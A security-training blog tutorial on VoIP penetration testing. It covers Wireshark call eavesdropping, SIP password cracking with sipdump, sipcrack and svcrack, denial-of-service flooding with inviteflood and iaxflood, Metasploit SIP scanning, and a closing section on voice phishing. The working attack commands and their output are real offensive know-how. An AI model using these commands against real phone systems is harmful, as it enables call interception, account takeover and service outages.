VoIP Sniffing Cracking Phishing & Metasploit Testing Tutorial

We have discussed about the VoIP penetration testing and security risk and this is the second part of this series article/tutorial, VoIP and wireless security is an important field to discuss because the security risks are very high so below is the demonstration on VoIP hacking with different tools and operating system that has been used for the demonstration was Linux backtrack 5 r2.

 

Sniffing on VoIP Network

The concept of sniffing in VoIP network is the same as a general
network sniffing concept. I will use some of the most famous tools to
demonstrate the sniffing attack on VoIP network. Let us start with
Wireshark, which is able to capture VoIP traffic.

Now let’s suppose the end users (extensions) are busy
communicating with each other, and that an attacker is trying to
capture some traffic so that he/she will able to get the data (their
communication).


Wireshark has captured some traffic. As discussed above on the
protocol section, RTP contains the information. The question now is:
how do we extract information from these packets? Wireshark provides
the option to extract the information with a built-in feature for
VoIP. Click on the telephony tab – VoIP calls you. You will then
get this window:


Click on the player, then on the decode tab. You are now able to
listen in to this communication and all of the data available in the
audio file.


 

SIP Authentication Cracking (VoIP Cracking)


The importance of password is not a hidden
truth, so in this section I will show you how to crack the password
of any extension (user) on VoIP network. This attack is the most
dangerous, because if an attacker know your password, then he/she
will be able to authenticate on the network by using your identity.

The Wireshark result can be used for
authentication cracking. Save the result into name.pcap; we will now
use a wonderful tool called SIPcrack. It contains two scripts: one,
sipdump, which will allow you to dump the authentication data into
hashes; the second, sipcrack, which will help you to crack the VoIP
password.


01
02
03
04
05
06
07
08
09
10
11
12
13
[email protected]:~/Desktop/SIPcrack# ./sipdump
pass.txt -p aa.pcap

SIPdump 0.3pre ( MaJoMu | www.codito.de
)

—————————————

* Using pcap file ‘aa.pcap’ for sniffing

* Starting to sniff with packet filter
‘tcp or udp’

* Dumped login from 192.168.1.9 ->
192.168.1.3 (User: ‘600’)

Exiting, sniffed 1 logins

Sipcrack needs a wordlist to launch an
attack. As a result, it will give you the password.


Another wonderful tool that will help you to
crack the SIP password is svcrack. As with the others, it can be find
under the tool suite of sipvicious. Svcrack is wonderful for brute
force attacks on SIP accounts.


1
2
3
4
5
6
7
[email protected]:/pentest/voip/sipvicious#
./svcrack.py -u600 -d list.txt 192.168.1.9

| Extension | Password |

————————

| 600 | 12345 |

Denial of Service Attack on VoIP Network

 


Denial of server (DOS) attack is a dangerous attack that can cause
the VoIP network and devices to crash. Inviteflood is the tool used
to launch DOS attacks against any extensions (user) on the VoIP
network. Usage:

1
2
./inviteflood interface targetuser
targetdomain floodtarget numberofpackets

./inviteflood eth0 600 192.168.1.3
192.168.1.3 200000

It seems to be a “ping of death” attack
and it will crash the end user operating system, disabling the
ability of he/she to make any calls.


Iaxflood is another a good tool that can
flood the IAX2 protocol; the usage is very simple:

1
2
[email protected]:/pentest/voip/iaxflood#
./iaxflood

usage: ./iaxflood sourcename
destinationname numpackets

A simple usage like:

01
02
03
04
05
06
07
08
09
10
11
[email protected]:/pentest/voip/iaxflood#
./iaxflood 192.168.1.13 192.168.1.2 10000

Will flood port 4569 from port 4569
10000 times

We have IP_HDRINCL

Number of Packets sent:

Sent 10000

[email protected]:/pentest/voip/iaxflood#

Metasploit on VoIP Penetration Testing

Metasploit has a different auxiliary module
for VoIP network. Here is the list of some best auxiliary modules of
metasploit for VoIP hacking:

  • auxiliary/scanner/sip/options
    (To find the SIP enable devices)
  • auxiliary/scanner/sip/enumerator (To
    enumerate the extensions)

We can do basic VoIP network penetration
testing by using metasploit auxiliary modules for information
gathering and enumeration. We can scan an entire network to find the
SIP enable devices, plus metasploit auxiliary modules are fast.


01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
msf > use
auxiliary/scanner/sip/options

msf auxiliary(options) > set RHOSTS
192.168.1.1/24

RHOSTS => 192.168.1.1/24

msf auxiliary(options) > run

[*] 192.168.1.3 sip:[email protected]
agent=’WAcjCpW’

[*] 192.168.1.9 200 agent=’Asterisk PBX
1.6.0.26-FONCORE-r78′ verbs=’INVITE, ACK, CANCEL, OPTIONS, BYE,
REFER, SUBSCRIBE, NOTIFY, INFO’

[*] 192.168.1.9 200 agent=’Asterisk PBX
1.6.0.26-FONCORE-r78′ verbs=’INVITE, ACK, CANCEL, OPTIONS, BYE,
REFER, SUBSCRIBE, NOTIFY, INFO’

[*] Scanned 256 of 256 hosts (100%
complete)

[*] Auxiliary module execution completed

msf auxiliary(options) >

VoIP Phishing

Security awareness is very important. Before
concluding this article, I just want to briefly discuss VoIP
phishing. Phishing is not a new attack – it is pretty old school –
but it remains a threat because hackers usually use some social
engineering technique to trick a user before stealing his/her
credential information. You might have heard about email phishing, in
which an attacker directs the victim to a fake page, so that they
will enter their confidential information. In the same fashion, a
hacker can hijack your calls to get your credential information.

Let’s suppose someone received a call or
email like this:

“Hi, this is an urgent email (call) that has been
generated by the network administrator. We have found something wrong
with your account, so please call back at XXXX-XXXX-XXX to verify
your account.” “

Typically, an unwary user will call back;
the hacker may then ask for some confidential information. You need
to understand the risk; educate people around you.




Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

How to Install Kali Linux on VirtualBox [Windows Host] in 2020

Kali Linux is a Debian based Linux distribution, released on the 13th March 2013 as a complete rebuild of BackTrack Linux. It is one of...

Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies London, United Kingdom – February 5, 2019 – Acunetix,...

What is Ethical Hacking, how to be an Ethical Hacker

Hacking is the process of discovering vulnerabilities in a system and using these found vulnerabilities by gaining unauthorized access into the system to perform...

Basic steps to ensure security Online!

Security concerns are growing day by day due to the growing interconnectivity and technology. Drastic things can happen if you be a little careless...